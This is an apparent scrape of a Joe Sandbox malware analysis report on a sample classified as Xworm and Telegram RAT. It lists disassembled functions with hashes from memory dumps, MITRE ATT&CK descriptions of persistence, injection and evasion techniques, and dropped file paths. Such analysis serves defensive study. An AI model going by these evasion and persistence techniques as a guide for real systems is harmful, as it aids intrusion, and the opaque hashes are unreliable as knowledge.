Instruction Fuzzy Hash: AAD12331D4DA8A9FE7659B6898155BD7BB0FF06394B0802FED44ECB8D7D918AC05C342

Function 00007FF887D29E7C Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2404040856.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887d20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 366072fa9adaf4e221c83c54a5fa81db7541bb7e533a9fe5c5b70adb7f45b3d9
Instruction ID: d8ae6bdaa2948f7efaa1050efcb72026d56931d416195e8f96d075d12c6a064e
Opcode Fuzzy Hash: 366072fa9adaf4e221c83c54a5fa81db7541bb7e533a9fe5c5b70adb7f45b3d9
Instruction Fuzzy Hash: 5C912E73D4DA974FD302A76CE8A11E97B60FF523A5B0901B7C4AD8A097EE1C34578291

Function 00007FF887D29770 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2404040856.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887d20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e5ee7889f046111dec7f7b9f3e12163c8c739082dff06cb4d65a84f52192c1f
Instruction ID: 38e9b6aa587983c6556c71423f32117e415bd76c07f621845294b87ba84178ff
Opcode Fuzzy Hash: 8e5ee7889f046111dec7f7b9f3e12163c8c739082dff06cb4d65a84f52192c1f
Instruction Fuzzy Hash: 0141EA7191CB888FE7189F5CAC066F97BF0FB69711F04426FE449D3252CA64A856CBC2

Function 00007FF887C0ED40 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2402004879.00007FF887C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887c0d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50e19dd1b01c5a3c88b31723a615550711ff6b176e36270f5cbcb8f71f24d0f1
Instruction ID: 67c3986dd4f3665baecf0ab85b1fad30de3c2cc240a9eb799e7585bf40bfc586
Opcode Fuzzy Hash: 50e19dd1b01c5a3c88b31723a615550711ff6b176e36270f5cbcb8f71f24d0f1
Instruction Fuzzy Hash: E741227084DBC44FE7569B28D8419623FF1FF53360B1902DFD088CB1A3D629A84AC7A2

Function 00007FF887D2A49C Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2404040856.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887d20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 274d19aad9edf6f1ce4dc6a70055f7d1db9d87a6fabb5db8e7fe1a681f442e27
Instruction ID: 33efe14cf2b2d0551f5e1095eed23391ed026eb3a6213bed09b2f4f6305445ee
Opcode Fuzzy Hash: 274d19aad9edf6f1ce4dc6a70055f7d1db9d87a6fabb5db8e7fe1a681f442e27
Instruction Fuzzy Hash: 8621363190C74C4FEB58DFAC984A7E97BF0EB96320F04426BD449C3156CA74A80ACB92

Function 00007FF887D233B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2404040856.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887d20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 3bbbef3d5142eedfdcedc6392593ffb73395c4b7190a8c7020276d550aea8722
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 6C01A73111CB0C4FD744EF0CE051AA9B3E0FB85360F10052DE58AC3661DA36E882CB42

Function 00007FF887DF414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2405962633.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887df0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28719d58a3def7cb7356c9c1a7acdc2641a56555b702edeb94ee86da0a6d7966
Instruction ID: 7671e9cbd584f922440e2cd52172da3438d6a6ba61f34f1dd8427a06b96ac0f0
Opcode Fuzzy Hash: 28719d58a3def7cb7356c9c1a7acdc2641a56555b702edeb94ee86da0a6d7966
Instruction Fuzzy Hash: F1F0BE32A4CA048FD798EB4CE4008AC73F0FF58360B2140BAE01EC71A7CA29EC45C751

Function 00007FF887DF4400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2405962633.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887df0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d22b5c087d7327be69e0f684ee946d91277c7e2a53306e23ae929aff0f4b23
Instruction ID: 65fe2cbb8734bf095e5dc2b017bb1695b1ac8dfecbd96c8752d58ed6ffe5962f
Opcode Fuzzy Hash: 76d22b5c087d7327be69e0f684ee946d91277c7e2a53306e23ae929aff0f4b23
Instruction Fuzzy Hash: 6BF0B832A4C6488FE758EA4CE4408AC77F0FF08324B5500B6E01EDB0A7DA2AAC94C751

Function 00007FF887DF41D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2405962633.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887df0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: fae55b345ab141f7ce33ebd8f4b5a346c4a0abb438dc3401fdedad8c8421e531
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: 0AE01A31B4C8088FDAA8DB0CE0409AD73E1FF9837172142B7D14ED7566CA22EC51CB90

Non-executed Functions

Function 00007FF887D28BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON

Download Yara Rule

Strings

N_^N, xrefs: 00007FF887D28C72
N_^?, xrefs: 00007FF887D28C2A
N_^K, xrefs: 00007FF887D28C6A
N_^8, xrefs: 00007FF887D28BF2
N_^J, xrefs: 00007FF887D28C62
N_^Q, xrefs: 00007FF887D28C8A
N_^Y, xrefs: 00007FF887D28CBA
N_^<, xrefs: 00007FF887D28C12

Memory Dump Source

Source File: 00000016.00000002.2404040856.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887d20000_powershell.jbxd

Similarity

API ID:
String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
API String ID: 0-2388461625
Opcode ID: 1febeceaada15ff85d2e78f40743ccfef67e4c360237bd4608141d80f364070f
Instruction ID: d065f70f907a4e25edb5db904a79f2fdbb5966f27ff4ea256d2dd697e7c81e9b
Opcode Fuzzy Hash: 1febeceaada15ff85d2e78f40743ccfef67e4c360237bd4608141d80f364070f
Instruction Fuzzy Hash: E921C5B3E145154AC30237FCBC516DC6B81EB553B834501F3E22DCF513D918648B8693

Function 00007FF887D206B0 Relevance: 8.9, Strings: 7, Instructions: 131COMMON

Download Yara Rule

Strings

8,_, xrefs: 00007FF887D20761
/_, xrefs: 00007FF887D20721
(0_, xrefs: 00007FF887D20781
P/_, xrefs: 00007FF887D20751
-_, xrefs: 00007FF887D207A1
H1_, xrefs: 00007FF887D20711
p0_, xrefs: 00007FF887D20741

Memory Dump Source

Source File: 00000016.00000002.2404040856.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887d20000_powershell.jbxd

Similarity

API ID:
String ID: (0_$8,_$H1_$P/_$p0_$-_$/_
API String ID: 0-1780797917
Opcode ID: c4392fa172f89a5bb0d22d040b1d8d2f4a8248748434e1e13203b7d976d0d5fd
Instruction ID: 96e967f0b8852fdb78d42aef7b2a6d63048f11d244c6e98f40168f2b8aad9938
Opcode Fuzzy Hash: c4392fa172f89a5bb0d22d040b1d8d2f4a8248748434e1e13203b7d976d0d5fd
Instruction Fuzzy Hash: 4D412962D6E5C14FF31A46742C192796EB1BF12B80B0841BFC0AD470DFCA5CAC1AC796

Analysis Process: Systen UserPID: 4872, Parent PID: 1124COMMON

Executed Functions

Function 00007FF887D312D9 Relevance: 12.1, Strings: 9, Instructions: 834COMMON

Download Yara Rule

Strings

8ML, xrefs: 00007FF887D31A15
0DL, xrefs: 00007FF887D31AC0
0DL, xrefs: 00007FF887D31B11
6B, xrefs: 00007FF887D3193E
6B, xrefs: 00007FF887D317F1
0DL, xrefs: 00007FF887D31A4B
6B, xrefs: 00007FF887D319DA
"rB, xrefs: 00007FF887D31815
6B, xrefs: 00007FF887D318AE

Memory Dump Source

Source File: 0000001A.00000002.2494753872.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887d30000_Systen User.jbxd

Similarity

API ID:
String ID: 6B$6B$6B$6B$"rB$0DL$0DL$0DL$8ML
API String ID: 0-3591008332
Opcode ID: 374bb63dd18171b0541cbb13e7442e1a40ef498f8a1322176453215c826009f6
Instruction ID: 6143a8506ad661cae44362859c86ddf6cc4189eda09f0e5cbed564171b66536c
Opcode Fuzzy Hash: 374bb63dd18171b0541cbb13e7442e1a40ef498f8a1322176453215c826009f6
Instruction Fuzzy Hash: C1427421B18A4A4FE798FB7884597BDB7E2FF98740F544579D44FC328AED2CA8018742

Function 00007FF887D31CFD Relevance: 1.5, Strings: 1, Instructions: 203COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF887D31DD2

Memory Dump Source

Source File: 0000001A.00000002.2494753872.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887d30000_Systen User.jbxd

Similarity

API ID:
String ID: r6B
API String ID: 0-2624010786
Opcode ID: eb5def10e42a6010671cc3077ab90918d8f084e1e2dd906cc19a19612a3dbe9a
Instruction ID: 95b9b5d05df64440686ea45b6ced93dde0d05af6507e93bd50cf847d6b6a1826
Opcode Fuzzy Hash: eb5def10e42a6010671cc3077ab90918d8f084e1e2dd906cc19a19612a3dbe9a
Instruction Fuzzy Hash: 9751F320A5DAC64FE786AB7868643797FE5EF87255B0801FBE08AC71D7DD0C5806C342

Function 00007FF887D30540 Relevance: 1.4, Strings: 1, Instructions: 138COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF887D31DD2

Memory Dump Source

Source File: 0000001A.00000002.2494753872.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887d30000_Systen User.jbxd

Similarity

API ID:
String ID: r6B
API String ID: 0-2624010786
Opcode ID: 4af74b426b18239b16c7acbf61731f9bc8c2c0fc2a09d3ef17fabf10578f8c5b
Instruction ID: 96ffd126415e0fef70fe6516b640b26080e53d2ac1faea4e8141a188c013c6a6
Opcode Fuzzy Hash: 4af74b426b18239b16c7acbf61731f9bc8c2c0fc2a09d3ef17fabf10578f8c5b
Instruction Fuzzy Hash: 3C31C221F1894A4FE798EB6CA45A378A6D2EF99791F0401BEE00EC32D3DE6C9C418341

Function 00007FF887D30AE9 Relevance: 1.4, Strings: 1, Instructions: 118COMMON

Download Yara Rule

Strings

6B, xrefs: 00007FF887D30B12

Memory Dump Source

Source File: 0000001A.00000002.2494753872.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887d30000_Systen User.jbxd

Similarity

API ID:
String ID: 6B
API String ID: 0-2065085838
Opcode ID: de773ccd5fd92bf3bfcabd67762a32a207f5d033eeed1106579865faa3d33b8f
Instruction ID: d3eff9ea57c1d768526f8b48c118d6e30396495e86bc20e356c9cd4df2af62ff
Opcode Fuzzy Hash: de773ccd5fd92bf3bfcabd67762a32a207f5d033eeed1106579865faa3d33b8f
Instruction Fuzzy Hash: 33317561F18A4A4FF784BBBC58593BD77E2FF98641F04427AE01EC3296DE2C99018742

Function 00007FF887D309A9 Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

HBL, xrefs: 00007FF887D309D9

Memory Dump Source

Source File: 0000001A.00000002.2494753872.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887d30000_Systen User.jbxd

Similarity

API ID:
String ID: HBL
API String ID: 0-3574280149
Opcode ID: bf4af0127ec4d6591666d3cbe7f8098844052aa82dcd53559760c44e26ee85e8
Instruction ID: 8e047aa24e86fd361a011a8742210555cf5c14b1de4cb1b1c7b30b240126a64d
Opcode Fuzzy Hash: bf4af0127ec4d6591666d3cbe7f8098844052aa82dcd53559760c44e26ee85e8
Instruction Fuzzy Hash: 04318F30E18A0E8FEB49EBA8C4656AD77B2FF98300F544579D01AD328ADE3CA845C751

Function 00007FF887D31EC1 Relevance: 1.3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

Strings

8eL, xrefs: 00007FF887D31EED

Memory Dump Source

Source File: 0000001A.00000002.2494753872.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887d30000_Systen User.jbxd

Similarity

API ID:
String ID: 8eL
API String ID: 0-2915619072
Opcode ID: b97df5df90b1a56dad633b7ec0232b1019447141f8dc15e76b2d3e8a1b948ef1
Instruction ID: 6f9b34a327874d781bba16b69ee59ac5043e126bbd64bc0d21cf9c7a001fba5a
Opcode Fuzzy Hash: b97df5df90b1a56dad633b7ec0232b1019447141f8dc15e76b2d3e8a1b948ef1
Instruction Fuzzy Hash: 7701441890DAC30FF781A738581443A7FF1AF91290B0C06BAD889C71AFEC1D9985C382

Function 00007FF887D30DE5 Relevance: .6, Instructions: 571COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2494753872.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887d30000_Systen User.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d760268ad7cc1bf16affd0cb539d817a776d15ffbe6cab2f019bf6390e83564
Instruction ID: d9a4b308b4ef46692c3870f80fec74fd6128ffc975c94d8aa9b4ef9614793235
Opcode Fuzzy Hash: 6d760268ad7cc1bf16affd0cb539d817a776d15ffbe6cab2f019bf6390e83564
Instruction Fuzzy Hash: 7141E432E18A4B9FE741E7B8D8612EDBBB1FF55290F0802B7C15AD7197DD282846C351

Function 00007FF887D30E30 Relevance: .5, Instructions: 538COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2494753872.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887d30000_Systen User.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92759d1531ddd1dd71a9b280e977660b28ec29cdb4faa279ba6d433f2a771ad3
Instruction ID: e0db120019087e57d12846c5ac9c60ba7bbe9f636d69c00545ff7e12b7304cd5
Opcode Fuzzy Hash: 92759d1531ddd1dd71a9b280e977660b28ec29cdb4faa279ba6d433f2a771ad3
Instruction Fuzzy Hash: D331B321D58A4B9FE741D7A898612EDBFF2FF55240F440276C00AE71DBDD282845C741

Function 00007FF887D30C4E Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2494753872.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887d30000_Systen User.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b368077cf8c20a9da4a4590c81f1014418606e217890ab3468b529795303b9f3
Instruction ID: 5c181fbb5f6a9ab5f869a8be1ba57a397e4444d15448e3fec50499a22c7b028d
Opcode Fuzzy Hash: b368077cf8c20a9da4a4590c81f1014418606e217890ab3468b529795303b9f3
Instruction Fuzzy Hash: 39514B20A0D7860FE357A778981A2B97FE2EF8765070940FAD48DC7193DD1C9C46C352

Function 00007FF887D30858 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2494753872.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887d30000_Systen User.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ce35b9f819c05da8c5d7d8eccb708bec8d519d9067223cfc4535be3b29439c6
Instruction ID: 6b88e6b80bfed8bfac5bae3ecbebc7096b7ba3221bb83139b24b083de54351b2
Opcode Fuzzy Hash: 0ce35b9f819c05da8c5d7d8eccb708bec8d519d9067223cfc4535be3b29439c6
Instruction Fuzzy Hash: 0E31B62091864D8FD785F7A8C0A56EC7B73FF88344B8481A5D419C338FDD3C69018762

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ozgpPwVAu1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Threatname: Telegram RAT

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Systen User.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ozgpPwVAu1.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Log.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_254ljbms.2w3.ps1

Windows Analysis Report
ozgpPwVAu1.exe

